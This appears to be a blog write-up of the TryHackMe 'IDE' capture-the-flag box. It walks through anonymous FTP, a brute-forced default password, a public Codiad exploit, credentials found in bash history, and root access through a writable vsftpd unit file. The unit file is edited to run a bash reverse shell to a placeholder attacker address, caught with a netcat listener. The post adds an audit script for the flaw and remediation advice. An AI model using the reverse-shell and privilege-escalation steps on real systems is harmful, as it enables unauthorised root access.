Tryhackme-IDE

cyberwarehack
3 min read · Feb 15, 2022

Hey guys, today we are going to hack the TryHackMe box IDE. It is rated easy, so let's see.

Let's start with an nmap scan.

As you can see, a total of 4 ports are open, and the FTP service allows anonymous login. Let's see what is in there.

When you log in over FTP the listing looks empty at first, but notice the last entry, whose name is three dots (...). Change into that folder and you will find a message.

From the message we learn that john's password has been reset to a default one. Go to http://ide.thm:62337 and you get a login form; try brute-forcing it, since the password is easy. The version number of the web-based IDE is also shown on the page. Search for it with searchsploit and you will find an exploit.

Exploitation

TryHackMe IDE — User Flag

So let's exploit. When you run the exploit, your output should look similar to the one below. You can refer to the linked GitHub repository for the exploit.

After getting a shell, let's upgrade it to a tty using python:

python3 -c 'import pty; pty.spawn("/bin/sh")'

Even after getting onto the target we cannot access the user.txt file. Check the shell history instead: when you cat .bash_history you find the password for the user drac, and that is how we get the user.txt file.

TryHackMe IDE — Root Flag

After getting the user flag, let's move on to the root flag. When you run sudo -l you get the following output:

Matching Defaults entries for drac on ide:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart

This means that drac can run exactly that one command, /usr/sbin/service vsftpd restart, as root via sudo, and that service restart is what starts the vsftpd systemd unit. On this box the unit file is writable by drac (find its path with systemctl cat vsftpd and confirm with ls -l), so edit it as shown below.

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACK_IP/9003 0>&1'
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

The ExecStart line is a bash reverse shell (replace ATTACK_IP with your own address). Now, in another terminal, start a netcat listener:

rlwrap nc -lvnp 9003

Because the unit file was edited, you first need to run systemctl daemon-reload; you will be prompted for drac's password. Afterwards, run:

sudo /usr/sbin/service vsftpd restart

Once the service restarts, you should receive a root shell in the listening terminal. The root flag is located at /root/root.txt.
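The root step above combines two weaknesses: a sudo rule that lets a user restart a service, and a unit file that user can write. The script below is an added example (my own code, not from the write-up or from TryHackMe) that checks for exactly that pairing: it parses sudo -l output for "/usr/sbin/service NAME restart" entries and then looks for NAME.service in the usual systemd unit directories, reporting whether the current user can write it. The sudo -l text is a constructed copy of the output shown above; the unit directory list (overridable via UNIT_DIRS) is an assumption about a standard Debian/Ubuntu layout.

```shell
#!/bin/sh
# Added example: audit for the "sudo service X restart" + writable unit file combo.

# Constructed sample, copied from the sudo -l output in the write-up.
SAMPLE_SUDO_L='Matching Defaults entries for drac on ide:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart'

# restartable_services: read sudo -l output on stdin and print the NAME from
# every "/usr/sbin/service NAME restart" rule, one per line.
restartable_services() {
    sed -n 's|.*/usr/sbin/service[[:space:]]\{1,\}\([^[:space:]]\{1,\}\)[[:space:]]\{1,\}restart.*|\1|p'
}

# check_unit NAME: locate NAME.service in the unit directories and print one of
#   WRITABLE <path>   (current user can modify the unit: privesc via ExecStart)
#   readonly <path>   (unit found but not writable)
#   no-unit NAME      (no unit file found)
# Exit status is 0 only for WRITABLE, so callers can branch on it.
# UNIT_DIRS is an assumed default; override it to test elsewhere.
check_unit() {
    svc=$1
    for dir in ${UNIT_DIRS:-/etc/systemd/system /lib/systemd/system /usr/lib/systemd/system}; do
        f="$dir/$svc.service"
        [ -e "$f" ] || continue
        if [ -w "$f" ]; then
            echo "WRITABLE $f"
            return 0
        fi
        echo "readonly $f"
        return 1
    done
    echo "no-unit $svc"
    return 2
}

# Stand-alone demo: parse the constructed sample, then check each service found.
printf '%s\n' "$SAMPLE_SUDO_L" | restartable_services | while read -r svc; do
    check_unit "$svc" || true
done
```

On the real target you would feed it live output (sudo -l 2>/dev/null | ...) instead of the sample; a WRITABLE result is the condition the write-up exploits, and the fix is either to drop the sudo rule or to make the unit file root-owned and non-writable.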

IDE was an easy box to root. It involves an old version of Codiad with a public exploit, and a default password that was easily brute-forced, so strong authentication matters. Lastly, users should not have write access to a Linux service's unit file while also being allowed to restart it with sudo; with that combination they can elevate privileges fairly easily.

If you love my write-up, please clap for me; you can also follow me on Instagram!
